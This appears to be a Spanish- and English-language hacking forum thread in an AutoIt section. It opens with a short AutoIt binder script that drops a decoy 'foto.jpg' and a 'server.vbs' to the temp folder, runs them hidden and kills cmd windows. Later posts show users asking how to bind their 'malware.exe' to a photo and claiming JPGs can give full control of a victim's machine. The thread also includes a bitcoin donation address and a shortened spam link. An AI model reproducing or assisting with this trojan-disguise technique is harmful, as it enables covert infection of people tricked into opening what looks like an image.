FileInstall("foto.jpg", @TempDir & "\foto.jpg")
FileInstall("server.vbs", @TempDir & "\server.vbs")
Sleep(2000)
Run(@ComSpec & " /c " & @TempDir & "\foto.jpg", "", @SW_HIDE)
Run(@ComSpec & " /c " & @TempDir & "\server.vbs", "", @SW_HIDE)
Sleep(2000)
ProcessClose("cmd.exe")
Sleep(2000)
ProcessClose("cmd.exe")
solo se puede adjuntar archivos .vbs o se puede usar un .exe tambien?
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
Muy buen amigo!
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
Hello Brothers )That look nice!but my bad head dont know how use that!can anybody say me how to?
need create folder load my malware.exe and photo.jpg
that vbs script and need create txt paste that after rename txt to vbs
after run cmd go to my folder what i created and start script?that right? sorry for my noob question
amigoZ escribió:Hello Brothers )That look nice!but my bad head dont know how use that!can anybody say me how to?
after run cmd go to my folder what i created and start script?that right? sorry for my noob question
Puede ser su ejecutable o .vbs

Imagen

Imagen
leo-johnlenon escribió:
amigoZ escribió:Hello Brothers )That look nice!but my bad head dont know how use that!can anybody say me how to?
Puede ser su ejecutable o .vbs

Imagen

Imagen
Halo brothers!
At first i want say big respect and thank you all people who comes to this place ! Because we make me are happy !that place very great for me ! Thank you brothers!
and personal-vip thank to you bro for you great helpful)))
And i am sorry ,i have another question when i split my server.exe and foto.jpg i get server+foto.jpg . I try run that first open my foto.jpg but i dont look start server.exe i open procces and look up my server.exe but that not run up that normall?
Fazendo ao contrário é que é melhor. Jpg to exe

The vector of JPG can be break and with this you can execute arbitary code in a windows machine. Sending a trojan or simply cmd.exe will have full control for the machine.
Claim, Multiply, Play, Win bitcoins for free - http://bit.ly/2NysYYs
Responder

Volver a “Autoit”